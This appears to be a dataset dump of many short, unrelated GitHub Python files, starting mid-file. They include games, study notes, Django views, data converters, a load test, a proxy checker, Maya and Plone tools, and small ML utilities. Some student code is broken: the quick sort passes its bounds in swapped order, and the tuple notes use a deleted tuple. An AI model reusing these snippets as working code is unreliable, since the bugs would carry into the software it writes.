play_game(self):\n print(\"Game start!\")\n while len(self.score1) < self.n and len(self.score2) < self.n:\n print(f\"Round:\", len(self.counter))\n self.counter.append(1)\n self.play_round()\n if len(self.score1) > len(self.score2):\n print(\"Player 1 wins! The final score is: \"\n \"Player 1:\", len(self.score1),\n \" Player 2:\", len(self.score2))\n else:\n print(\"Player 2 wins! The final score is: \"\n \"Player 2:\", len(self.score2),\n \" Player 1:\", len(self.score1))\n\n\nif __name__ == '__main__':\n player_type = [RandomPlayer(), ReflectPlayer(), CyclePlayer()]\n intro()\n game = Game(random.choice(player_type),\n HumanPlayer(), number_game(), [], [], [1])\n game.play_game()\n","repo_name":"sortsammcdonald/udacity_intro_to_programming","sub_path":"rock_paper_scissors_assignment.py","file_name":"rock_paper_scissors_assignment.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22785728989","text":"# SOME NOTES FOR TUPLES IN PYTHON\n\n# Ordered and Unchangeable. Allow duplicate members.\n\n# Constructor\n\nuser_tuple = tuple((\"Andres\", \"Ramon\", \"Eduardo\"))\n\n# Creation\nthis_tuple = (\"juan\", \"pedro\")\n\n# Access\nprint(this_tuple[0]) # This will return the item 0 of the tuple\n\n# Replace a value (NOT POSSIBLE)\n\n# Loop\nfor x in this_tuple:\n print(x)\n\n\n# Item presented\nif \"Andres\" in this_tuple:\n print(\"Yes!!\")\n\n\n# Length\nprint(len(this_tuple))\n\n# Add items (NOT POSSIBLE)\n\n# Remove items (NOT POSSIBLE)\n\n# Remove tuple\n\ndel this_tuple # This will remove the tuple\n\n\n# Count\nthis_tuple.count(2) # This will return the number of times that 2 appears on the tuple\n\n# Index\nthis_tuple.index(3) # This will return the position of the specific value\n","repo_name":"andresbarros23/pythonPractice","sub_path":"training/Tuples.py","file_name":"Tuples.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30122765858","text":"import os\nimport sys\nimport xml.etree.ElementTree as ET\nimport glob\n\ndef xml_to_txt(indir,outdir):\n\n os.chdir(indir)\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n annotations = os.listdir('.')\n print(annotations)\n for i, file in enumerate(annotations):\n\n file_save = file.split('.')[0]+'.txt'\n file_txt=os.path.join(outdir,file_save)\n picname=annotations[i].split('.')[0]\n\n f_w = open(file_txt,'w')\n\n # actual parsing\n in_file = open(file)\n tree=ET.parse(in_file)\n root = tree.getroot()\n\n for obj in root.iter('object'):\n current = list()\n name = obj.find('name').text\n\n xmlbox = obj.find('bndbox')\n xn = xmlbox.find('xmin').text\n xx = xmlbox.find('xmax').text\n yn = xmlbox.find('ymin').text\n yx = xmlbox.find('ymax').text\n print (name)\n f_w.write(picname+'.png'+' '+name+' '+xn+' '+yn+' '+xx+' '+yx+' ')\n f_w.write('\\n')\n\n\nfile = os.path.basename(__file__)\nprint(file)\nindir='pic-15-label' #xml目录\noutdir='xml2txt' #indir下txt目录\nprint(indir)\nxml_to_txt(indir,outdir)\n","repo_name":"punknownq/video_preprocessing","sub_path":"xml2txt (annotation).py","file_name":"xml2txt (annotation).py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31620081906","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nimport operator\n\n\ndef home(request):\n return render(request, 'home.html')\n\n\ndef about(request):\n return HttpResponse(\"This is the About Page\")\n\n\ndef count(request):\n fulltext = request.GET['fulltext']\n\n wordlist = fulltext.split()\n\n wordfrequenter = {}\n\n for word in wordlist:\n if word in wordfrequenter:\n wordfrequenter[word] += 1\n else:\n wordfrequenter[word] = 1\n\n sortedwords = sorted(wordfrequenter.items(), key=operator.itemgetter(1), reverse=True)\n\n\n context = {\n \"fulltext\" : fulltext,\n \"count\" : len(wordlist),\n 'sortedwords' : sortedwords\n }\n return render(request, 'count.html', context=context)\n","repo_name":"pccode21/DjangoLearn","sub_path":"wordcounter-website/wordcounter/wordcounter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14684191430","text":"from collections.abc import Generator, Iterable\nfrom typing import Any\n\n\ndef flatten(xs: Iterable[Any | Iterable[Any]]) -> Generator[Any, None, None]:\n for x in xs:\n if isinstance(x, Iterable) and not isinstance(x, (str, bytes)):\n yield from flatten(x)\n else:\n yield x\n","repo_name":"iagocanalejas/pyutils","sub_path":"pyutils/lists/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17063571929","text":"import google.auth\nimport google.auth.transport.requests\nimport os\nimport json \n# Authenticate with Google Cloud.\n# See: https://cloud.google.com/docs/authentication/getting-started\nd={}\n\n#Set the ServiceAccount file \nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"../compose-test-291802-1f8ba3535e89.json\"\n\n#print(os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"])\n\ncredentials, _ = google.auth.default(\n scopes=['https://www.googleapis.com/auth/cloud-platform'])\n\n#credentials= \"../seismic-elf-261104-c47aa69e86d6.json\"\nauthed_session = google.auth.transport.requests.AuthorizedSession(\n credentials)\n\nproject_id = 'compose-test-291802'\nlocation = 'us-central1'\ncomposer_environment = 'sanch-composer2'\n\nenvironment_url = (\n 'https://composer.googleapis.com/v1beta1/projects/{}/locations/{}'\n '/environments/{}').format(project_id, location, composer_environment)\nresponse = authed_session.request('GET', environment_url)\nenvironment_data = response.json()\n\n# Print the bucket name from the response body.\ndag_bucket=environment_data['config']['dagGcsPrefix']\ndag_bucket= dag_bucket + '/'\n\nd[\"dag_bucket\"]=dag_bucket\nprint(json.dumps(d))\n","repo_name":"sanchayana2007/Terraform","sub_path":"gcp/2_CSV_DA_Pipeline/get_DAG_Bucket_details.py","file_name":"get_DAG_Bucket_details.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32511421388","text":"# quick sort implementation\n# the pivot will be the starting value on array\n# hi = len(array) - 1, lo = 0\n\n\ndef quick_sort (array, hi, lo):\n if lo >= hi:\n return \n\n pivot = array[lo]\n pivotIdx = lo\n\n for i in range (lo, hi + 1):\n # checks how many items are less than the pivot to partition array\n if array[i] < pivot:\n pivotIdx += 1\n array[pivotIdx], array[i] = array[i], array[pivotIdx]\n\n # moves the pivot\n array[lo], array[pivotIdx] = array[pivotIdx], array[lo]\n\n # recursive call \n quick_sort (array, lo, pivotIdx - 1)\n quick_sort (array, pivotIdx + 1, hi)\n\n\n","repo_name":"mag6367/Python_Sorting_Algorithms","sub_path":"recursive_sorting/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71689222811","text":"\nfrom locust import HttpLocust,between,TaskSet,task\n\nclass Recommend_keywords(TaskSet):\n\n @task(1)\n def get_recommend_keywords(self):\n header=dict(\n cookie = ''\n )\n resp = self.client.get(\n '',\n params = dict(dimension='desc',\n words='运动,音乐'\n ),\n headers=header\n )\n print('success') if resp.status_code == 200 else print('fails')\n \nclass WebsiteUser(HttpLocust):\n task_set = Recommend_keywords\n wait_time=between(3,5)\n\nif __name__ == \"__mian__\":\n 'locust -f file.py --no-web -c 1 -r 1 --run-time 10s --host=http:..'","repo_name":"Jaden-Yu/pytest_test","sub_path":"scripts/api_test/performance/test_keywords.py","file_name":"test_keywords.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24902694519","text":"#! /usr/bin/python3 env\n# -*- coding:utf-8 -*-\n\n'''\nCreated on 2018年10月16日\n\n@author: liwei\n'''\n\nimport urllib.request\nimport threading\nfrom fake_useragent import UserAgent\n\nclass TestProxy(object):\n def __init__(self):\n self.rfile = 'proxy.txt'\n self.wfile = 'new3proxy.txt'\n self.threads = 10\n self.alivelist = []\n self.get_links()\n self.save_proxy()\n \n def save_proxy(self):\n with open(self.wfile, 'a') as fp:\n for alive in self.alivelist:\n fp.write(alive + '\\n')\n \n def get_links(self):\n with open(self.rfile, 'r') as fp:\n lines = fp.readlines()\n line = lines.pop()\n while lines:\n for i in range(self.threads):\n t = threading.Thread(target=self.getAliveProxy, args=(line, ))\n t.start()\n if lines:\n line = lines.pop()\n else:\n continue\n \n def getAliveProxy(self, line):\n flag = True\n ua = UserAgent()\n url = 'http://zuihaodaxue.com/shengyuanzhiliangpaiming2018.html'\n while flag:\n fakeHeaders = {'User-Agent':ua.random}\n request = urllib.request.Request(url, headers=fakeHeaders)\n \n proxys = 'http://' + line\n handler = urllib.request.ProxyHandler({'http':proxys}) \n opener = urllib.request.build_opener(handler)\n urllib.request.install_opener(opener)\n try:\n response = urllib.request.urlopen(request)\n except: \n print('proxy error')\n return\n else:\n self.alivelist.append(line)\n print(line)\n print('proxy true')\n \nif __name__ == '__main__':\n TP = TestProxy()\n print('ending...')","repo_name":"lwdysj/lw-1","sub_path":"getdata_zuihaodaxue/testProxy.py","file_name":"testProxy.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25104686619","text":"from najot.models import Service\n\n\ndef services_id(request, params):\n if params['pk']:\n services = Service.objects.filter(id=params['pk']).first()\n return {\n \"id\": services.id,\n \"Xizmat turi\": services.name_uz,\n \"Icon\": services.svg,\n \"Doktrning_ismi\": services.doktor.name,\n\n }\n","repo_name":"XusanDev07/najot","sub_path":"najot/methods/all_function/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26252294423","text":"#! usr/bin/env python3\n# -*- coding: -*-\n\nimport psycopg2 as psy\nfrom rich.console import Console\nfrom rich.table import Table\n\n''' \nՄոդուլի այս հատվածը հավելվածի աբսրտակցիայի առաջին կամ եթե կարելի է այդպես ասել հավելվածի շրջանակներում\n\"ամենացածր\" մակարկան է, քանի որ անմիջականորեն կապ է ստեղծում տվյալների բազզայի հետ ապահովելով\nամբողջ հավելվածի աշխատանքը վերջինիս հետ։\n'''\n\n\nclass DbManager:\n\n # Կապ հաստատել ՏԲ հետ և պահպանել այդ վիճակը self.connection-ում։\n def __init__(self, base_name):\n self.connection = psy.connect(dbname=base_name)\n\n # ՏԲ հ��րցումը կատարող ֆունկցիա\n def execute(self, statement, values=None):\n with self.connection:\n cursor_connect = self.connection.cursor()\n cursor_connect.execute(statement, values or [])\n return cursor_connect\n\n # Կստեղծի ՏԲ աղյուսակը\n def db_table_maker(self, table_name, column):\n column_and_types = [f'{column_name} {column_type}'\n for column_name, column_type in column.items()]\n self.execute(\n f'''\n CREATE TABLE IF NOT EXISTS {table_name} \n ({', '.join(column_and_types)}); \n '''\n )\n\n # Կպատրաստի և կփոխանցի տվյալները\n def add_data(self, table_name, data):\n placeholders = ', '.join(['%s'] * len(data))\n column_name = ', '.join(data.keys())\n column_value = tuple(data.values())\n self.execute(\n f'''\n INSERT INTO {table_name}\n ({column_name})\n VALUES ({placeholders});''',\n column_value\n )\n\n # Հարցում որը կջնջի անպետք մարքերը բայց նախապայմանով։\n def to_delete(self, table_name, criteria):\n placeholders = [f'{column} = %s' for column in criteria.keys()]\n delete_criteria = ' AND '.join(placeholders)\n self.execute(\n f\"\"\"\n DELETE from {table_name}\n WHERE {delete_criteria};\n \"\"\", tuple(criteria.values()))\n\n # Հարցում որը կկատարի ընտրման գործողություն։\n def to_select(self, table_name, criteria=None, order_by=None):\n criteria = criteria or {}\n\n query = f'SELECT * from {table_name}'\n\n if criteria:\n placeholders = [f'{column} = %s' for column in criteria.keys()]\n select_criteria = ' AND '.join(placeholders)\n query += f'WHERE {select_criteria}'\n\n if order_by:\n query += f' ORDER BY {order_by};'\n\n rows = self.execute(query, tuple(criteria.values())).fetchall()\n\n table = Table(title='List of your Bookmarks', style='blue', )\n\n columns = {\n 'Id': 9,\n 'Title': 20,\n 'Url': 35,\n 'Notes': 25,\n 'Date': 25\n }\n for key, value in columns.items():\n table.add_column(f'{key}', justify='right', style='red', width=value)\n\n for row in rows:\n table.add_row(f'{row[0]}', f'{row[1]}', f'{row[2]}', f'{row[3]}', f'{row[4]}')\n console = Console()\n console.print(table)\n\n def __del__(self):\n self.connection.close()\n","repo_name":"StPatriarch/WebMarker","sub_path":"moduls/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"hy","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74554261532","text":"\"\"\"General utility functions\n\"\"\"\n\nimport os\nimport colorama\n\ncolorama.init(autoreset=True)\n\nCOLOR = {\n \"red\": colorama.Fore.RED,\n \"green\": colorama.Fore.GREEN,\n \"yellow\": colorama.Fore.YELLOW\n}\n\ndef list_files_with_ext(*paths, ext, maxdepth=-1):\n \"\"\"Creates a list of files with the specified extention\"\"\"\n needed_files = []\n for path in paths:\n if ext in path:\n needed_files.append(path)\n continue\n if not os.path.isdir(path):\n print_red(\n qte(path) + \" is not a directory nor does it contain \" +\n qte(ext) + \". Skipping.\"\n )\n continue\n path = os.path.realpath(path)\n start_level = path.count(os.sep)\n # pylint: disable=unused-variable\n # Need dirs to iterate\n for root, dirs, files in os.walk(path):\n depth = root.count(os.sep) - start_level\n if depth > maxdepth and (maxdepth != -1):\n break\n for filename in files:\n if ext in filename:\n needed_files.append(os.path.join(root, filename))\n return needed_files\n\ndef remove_comments(file_contents, comment_breaks):\n \"\"\"Removes all of the comments from a string\"\"\"\n for com_set in comment_breaks:\n opener = com_set[0]\n closer = com_set[1]\n while opener in file_contents:\n ind_start = file_contents.index(opener)\n keep_left = file_contents[:ind_start]\n rest = file_contents[ind_start:]\n keep_right = rest[rest.index(closer) + len(closer) : ]\n file_contents = keep_left + keep_right\n return file_contents\n\ndef print_yellow(lne):\n \"\"\"Prints the given string in yellow\"\"\"\n print(colorama.Fore.YELLOW + lne)\n\ndef print_red(lne):\n \"\"\"Prints the given string in red\"\"\"\n print(colorama.Fore.RED + lne)\n\ndef print_green(lne):\n \"\"\"Prints the given string in green\"\"\"\n print(colorama.Fore.GREEN + lne)\n\ndef build_terminal(tok):\n \"\"\"Builds a terminal statement for xml output\"\"\"\n terminal = \"<\" + tok[\"type\"] + \">\" + \" \" + \\\n str(tok[\"value\"]) + \" \" + \"\\n\"\n return terminal\n\ndef qte(lne):\n \"\"\"Quotes the given string\"\"\"\n return \"'\" + lne + \"'\"\n","repo_name":"khvorov45/jackcompiler","sub_path":"jackcompiler/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39455836702","text":"\"\"\" The user's form for managing tags and events subscriptions\n\"\"\"\n\nfrom eea.notifications.catalogtool import get_catalog\nfrom plone import api\nfrom plone.directives import form\nfrom z3c.form import button\nfrom z3c.form.browser.checkbox import CheckBoxFieldWidget\nfrom z3c.form.field import Fields\nfrom zope.interface import provider\nfrom zope.schema import Choice\nfrom zope.schema import List\nfrom zope.schema.interfaces import IContextAwareDefaultFactory\n\n\n@provider(IContextAwareDefaultFactory)\ndef default_tags(context):\n return [x for x in get_catalog().selected_tags(\n user_id=api.user.get_current().id)]\n\n\n@provider(IContextAwareDefaultFactory)\ndef default_events(context):\n return [x for x in get_catalog().selected_events(\n user_id=api.user.get_current().id)]\n\n\nclass IManageSubscriptionsForm(form.Schema):\n\n tags = List(\n title=u\"1. Select the content tags you are interested in.\",\n description=u\"\"\"\n Example: if you want to be notified when an item related to\n education is changed you will subscribe to \"education\" tag.\n \"\"\",\n value_type=Choice(vocabulary=\"tags_vocab\"),\n defaultFactory=default_tags,\n required=False,\n )\n\n events = List(\n title=u\"2. Select the type of events you want to be notified about.\",\n description=u\"\"\"\n Example: the item was deleted. You will receive a notification\n when an item (tagged with a tag you are interested in) is deleted.\n \"\"\",\n value_type=Choice(vocabulary=\"events_vocab\"),\n defaultFactory=default_events,\n required=False,\n )\n\n\nclass ManageSubscriptionsForm(form.SchemaForm):\n \"\"\" The user preferences related to notifications form\n \"\"\"\n\n schema = IManageSubscriptionsForm\n ignoreContext = True\n\n label = u\"Manage subscriptions\"\n description = u\"\"\"\n Notify me on content (changes) that is tagged with selected tags.\n \"\"\"\n\n css_class = \"manage-subscriptions-form\"\n\n fields = Fields(IManageSubscriptionsForm)\n fields['tags'].widgetFactory = CheckBoxFieldWidget\n fields['events'].widgetFactory = CheckBoxFieldWidget\n\n @property\n def notifications_catalog(self):\n return get_catalog()\n\n @property\n def user_id(self):\n \"\"\" The current user's id\n \"\"\"\n return api.user.get_current().getId()\n\n @button.buttonAndHandler(u'Update subscriptions')\n def handleApply(self, action):\n data, errors = self.extractData()\n if errors:\n self.status = self.formErrorsMessage\n return\n\n self.notifications_catalog.set_tags(data['tags'], self.user_id)\n self.notifications_catalog.set_events(data['events'], self.user_id)\n self.status = \"Your preferences have been updated.\"\n\n @button.buttonAndHandler(u\"Cancel\")\n def handleCancel(self, action):\n \"\"\" User cancelled. Redirect back to the front page.\n \"\"\"\n","repo_name":"eea/eea.notifications","sub_path":"eea/notifications/browser/user_preferences_form.py","file_name":"user_preferences_form.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42374196101","text":"from diagrams import Diagram, Cluster, Edge\nfrom diagrams.aws.storage import S3\nfrom diagrams.aws.network import APIGateway, Route53, CloudFront\nfrom diagrams.aws.compute import LambdaFunction\nfrom diagrams.aws.database import Dynamodb\nfrom diagrams.generic.device import Tablet, Mobile\nfrom diagrams.programming.framework import React\n\n\ngraph_attr = {\n \"fontsize\": \"45\",\n \"bgcolor\": \"transparent\"\n}\n\nwith Diagram(\"\", graph_attr=graph_attr, show=False, direction='LR'):\n with Cluster(\"\"):\n user_a = Tablet(\"Users\")\n\n with Cluster(\"AWS\"):\n \n with Cluster('CDN'):\n web_dns = Route53(\"Website DNS\")\n web_cf = CloudFront(\"Website CloudFront\")\n web_s3 = S3(\"Website S3 Bucket\")\n web_react = React(\"Static Files\")\n\n with Cluster('API'):\n api_dns = Route53('API DNS')\n api_gateway = APIGateway(\"API Gateway\")\n with Cluster(\"GET /\"):\n data_lambda = LambdaFunction(\"Lambda Function\")\n data_bucket = S3(\"Data S3 Bucket\")\n \n with Cluster(\"GET /tags\"):\n tags_lambda = LambdaFunction(\"Lambda Function\")\n tags_table = Dynamodb(\"Tag Dynamo Table\")\n \n\n with Cluster('Images'):\n images_bucket = S3(\"Images S3 Bucket\")\n images_lambda = LambdaFunction(\"Lambda Function\")\n images_cf = CloudFront(\"Images CloudFront\")\n images_dns = Route53(\"Images DNS\")\n\n user_a >> Edge(label=\"Access website\", color=\"black\") >> web_dns\n\n\n images_dns >> images_cf >> images_bucket\n web_dns >> web_cf >> web_s3 >> web_react\n\n api_dns >> api_gateway\n\n api_gateway >> data_lambda >> data_bucket\n api_gateway >> tags_lambda >> tags_table\n\n web_dns >> Edge(label=\"Retrieve data\") >> api_dns\n web_dns >> Edge(label=\"Retrieve images\") >> images_dns\n\n images_lambda >> Edge(label=\"resize and create thumbnail image\") >> images_bucket\n images_bucket >> Edge(label=\"trigger when putting item\") >> images_lambda","repo_name":"IsaacOrzDev/personal-website","sub_path":"diagram.py","file_name":"diagram.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13413169211","text":"import pprint\n\nfrom maya import cmds\n\nimport controllerLib\nreload (controllerLib)\n\nfrom PySide2 import QtWidgets, QtCore, QtGui\n\nclass ControllerLibraryUI(QtWidgets.QDialog):\n\n \"\"\"\n The Controller Library UI allows us to import and save controllers\n \"\"\"\n\n def __init__(self):\n super(ControllerLibraryUI, self).__init__()\n\n self.setWindowTitle('Controller Library UI')\n\n\n #Library variable points to an instance of our controller library\n self.library = controllerLib.ControllerLibrary()\n\n\n #Every new instance automatically build and populates the UI\n self.buildUI()\n self.populate()\n\n def buildUI(self):\n\n #Master Layout\n layout = QtWidgets.QVBoxLayout(self)\n\n #Child horizontal widget\n saveWidget = QtWidgets.QWidget()\n saveLayout = QtWidgets.QHBoxLayout(saveWidget)\n layout.addWidget(saveWidget)\n\n self.saveNameField = QtWidgets.QLineEdit()\n saveLayout.addWidget(self.saveNameField)\n\n saveBtn = QtWidgets.QPushButton('Save')\n saveBtn.clicked.connect(self.save)\n saveLayout.addWidget(saveBtn)\n\n\n #These are the thumbnail param\n size = 80\n buffer = 12\n\n #This creates the grid for thumbnails\n self.listWidget = QtWidgets.QListWidget()\n self.listWidget.setViewMode(QtWidgets.QListWidget.IconMode)\n self.listWidget.setIconSize(QtCore.QSize(size,size))\n self.listWidget.setResizeMode(QtWidgets.QListWidget.Adjust)\n self.listWidget.setGridSize(QtCore.QSize(size+buffer, size+buffer))\n layout.addWidget(self.listWidget)\n\n #This holds the buttons\n btnWidget = QtWidgets.QWidget()\n btnLayout = QtWidgets.QHBoxLayout(btnWidget)\n layout.addWidget(btnWidget)\n\n importBtn = QtWidgets.QPushButton('Import')\n importBtn.clicked.connect(self.load)\n btnLayout.addWidget(importBtn)\n\n refreshBtn = QtWidgets.QPushButton('Refresh')\n refreshBtn.clicked.connect(self.populate)\n btnLayout.addWidget(refreshBtn)\n\n closeBtn = QtWidgets.QPushButton('Close')\n closeBtn.clicked.connect(self.close)\n btnLayout.addWidget(closeBtn)\n\n\n\n def populate(self):\n\n #Clears and populates the library\n self.listWidget.clear()\n self.library.find()\n\n for name, info in self.library.items():\n item = QtWidgets.QListWidgetItem(name)\n self.listWidget.addItem(item)\n\n screenshot = info.get('screenshot')\n if screenshot:\n icon = QtGui.QIcon(screenshot)\n item.setIcon(icon)\n\n item.setToolTip(pprint.pformat(info))\n\n def load(self, *args):\n\n #Loads the object\n currentItem = self.listWidget.currentItem()\n\n if not currentItem:\n return\n\n name = currentItem.text()\n self.library.load(name)\n\n def save(self):\n\n #Saves the new object and name\n name = self.saveNameField.text()\n if not name.strip():\n cmds.warning(\"You must name the object!\")\n return\n\n self.library.save(name)\n self.populate()\n self.saveNameField.setText('')\n\ndef showUI():\n ui = ControllerLibraryUI()\n ui.show()\n return ui\n","repo_name":"disel91/DmitrysMayaScripts","sub_path":"Scripts/conLib/libUI.py","file_name":"libUI.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30122714747","text":"\"\"\"\r\n\n\nCreate a function that counts number of palindromes within two timestamps\ninclusive. A palindrome is a timestamp that can be read the same from left to\nright and from right to left (e.g. `02:11:20`).\n\n### Examples\n\n palindrome_time([2, 12, 22, 4, 35, 10]) ➞ 14\n \n palindrome_time([12, 12, 12, 13, 13, 13]) ➞ 6\n \n palindrome_time([6, 33, 15, 9, 55, 10]) ➞ 0\n\n### Notes\n\nInput list contains six numbers `[h1, m1, s1, h2, m2, s2]` for begin and end\ntimestamps.\n\n\"\"\"\r\n\nfrom datetime import datetime,timedelta\ndef palindrome_time(lst):\n a=[];k=0\n s1 = str(lst[0]) + ':' + str(lst[1]) +':' + str(lst[2])\n s2 = str(lst[3]) + ':' + str(lst[4]) + ':' + str(lst[5])\n FMT = '%H:%M:%S'\n t1 = datetime.strptime(s1, FMT)\n t2 = datetime.strptime(s2, FMT)\n while t1<=t2:\n a.append(str(t1)[11:13]+str(t1)[14:16]+str(t1)[17:19])\n t1 = t1 + timedelta(0, 1)\n for i in a:\n if i==i[:-9:-1]:\n k=k+1\n return (k)\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"htMy9tkX4wFWHZtsY_19.py","file_name":"htMy9tkX4wFWHZtsY_19.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16540635925","text":"import random\nimport numpy as np\nfrom model.dataset.loader import Loader\n\n\nclass Seq2SeqDataProcessor():\n\n def __init__(self, buckets):\n self.buckets = buckets\n \n def format(self, utterance_pair):\n source = list(utterance_pair[0])\n target = list(utterance_pair[1])\n\n bucket_id = self._detect_bucket(source, target + [0]) # + [0] is space for EOS\n s_adjusted, t_adjusted = self._adjust_to_bucket(source, target, self.buckets[bucket_id])\n return bucket_id, s_adjusted, t_adjusted\n \n def _detect_bucket(self, source, target):\n _id = -1\n for bucket_id, (source_size, target_size) in enumerate(self.buckets):\n if len(source) < source_size and len(target) < target_size:\n _id = bucket_id\n break\n return _id\n \n @classmethod\n def _adjust_to_bucket(cls, source, target, bucket):\n source_size = bucket[0]\n target_size = bucket[1]\n\n if len(source) <= source_size:\n source_pad = [Loader.PAD_ID] * (source_size - len(source))\n adjusted_source = list(reversed(source + source_pad))\n else:\n adjusted_source = list(reversed(source))[:source_size] # trim after reverse (last word maybe more important)\n \n if len(target) <= target_size - 2: # for GO & EOS TAG\n target_pad_size = target_size - len(target) - 2\n adjusted_target = [Loader.GO_ID] + target + [Loader.EOS_ID] + [Loader.PAD_ID] * target_pad_size\n else:\n adjusted_target = [Loader.GO_ID] + target[:target_size - 2] + [Loader.EOS_ID]\n \n return adjusted_source, adjusted_target\n\n def transpose_array(self, x, vertical_size, dtype=np.int32):\n \"\"\"\n x = list.\n return [size x len(x)] numpy array\n \"\"\"\n result = []\n for i in range(vertical_size):\n result.append(np.array([x[b][i] for b in range(len(x))], dtype=dtype))\n return result\n\n def batch_iter(self, training_data, batch_size, already_formatted=False):\n _formatted = training_data if already_formatted else [self.format(t) for t in training_data]\n\n bucket_boxs = [[] for _ in self.buckets]\n for b_id, source, target in _formatted:\n bucket_boxs[b_id].append([source, target])\n\n bucket_sizes = [len(bucket_boxs[b]) for b in range(len(self.buckets))]\n total_size = float(sum(bucket_sizes))\n buckets_scale = [sum(bucket_sizes[:i + 1]) / total_size for i in range(len(bucket_sizes))]\n\n while True:\n _random_number_01 = np.random.random_sample()\n bucket_id = min([i for i in range(len(buckets_scale)) if buckets_scale[i] > _random_number_01])\n encoder_size, decoder_size = self.buckets[bucket_id]\n\n encoder_inputs = []\n decoder_inputs = []\n weights = []\n for _ in range(batch_size):\n e, d = random.choice(bucket_boxs[bucket_id])\n if len(e) != encoder_size or len(d) != decoder_size:\n raise Exception(\"formatted size does not match with bucket size.\")\n encoder_inputs.append(e)\n decoder_inputs.append(d)\n weight = [1.0] * decoder_size\n for i in range(len(d)):\n if i < len(d) - 1:\n teacher = d[i + 1]\n if i == len(d) - 1 or teacher == Loader.PAD_ID:\n weight[i] = 0.0 # decode to last or PAD id is meaning less, so weight is 0\n weights.append(weight)\n \n batch_en = self.transpose_array(encoder_inputs, encoder_size)\n batch_de = self.transpose_array(decoder_inputs, decoder_size)\n batch_w = self.transpose_array(weights, decoder_size, dtype=np.float32)\n yield bucket_id, batch_en, batch_de, batch_w\n","repo_name":"icoxfog417/DialogueBreakdownDetection2016","sub_path":"model/baseline/seq2seq_data_processor.py","file_name":"seq2seq_data_processor.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"11855097005","text":"\"\"\"\nMultilayerPerceptron taken from https://github.com/alirezamika/evostra/blob/master/evostra/models/feed_forward_network.py\n\"\"\"\n\nimport numpy as np\n\nclass MultilayerPerceptron(object):\n \"\"\"\n Architecture:\n INPUT -> HIDDEN -> ... -> HIDDEN -> OUTPUT\n \"\"\"\n def __init__(self, input_size, output_size):\n # import mlp parameters\n from config import mlp_params\n self.layer_activation = mlp_params[\"layer_activation\"]\n self.use_bias = mlp_params[\"use_bias\"]\n kernel_initializer = mlp_params[\"kernel_initializer\"]\n bias_initializer = mlp_params[\"bias_initializer\"]\n layers = [input_size] + mlp_params[\"hidden_layers\"] + [output_size]\n\n # initialize weights and biases\n self.w, self.b = [], []\n for i in range(len(layers) - 1):\n self.w.append(kernel_initializer(shape=(layers[i], layers[i+1])))\n self.b.append(bias_initializer(shape=(layers[i+1])))\n\n def predict(self, inp):\n out = inp.flatten()\n for w, b in zip(self.w, self.b):\n out = np.matmul(w.T, out) + b\n out = self.layer_activation(out)\n return np.clip(out, -1, 1)\n\n def get_weights(self):\n if self.use_bias:\n return self.w + self.b\n else:\n return self.w\n\n def set_weights(self, weights):\n if self.use_bias:\n l = len(weights) // 2\n self.w = weights[:l]\n self.b = weights[l:]\n else:\n self.w = weights","repo_name":"vliu15/rcn","sub_path":"models/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"74617974490","text":"\nfrom selenium import webdriver\nfrom selenium.webdriver.edge.service import Service as EdgeService\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\nimport time\n\n\nclass FindingElementByXpath:\n def locate_by_Xpath(self):\n driver = webdriver.Edge(service=EdgeService(EdgeChromiumDriverManager().install()))\n driver.get('https://training.openspan.com/login')\n driver.maximize_window()\n state = driver.find_element(\"xpath\",\"//input[@id='login_button']\").is_enabled()\n print(state)\n time.sleep(1000) \n\n\nfindingbyXpath = 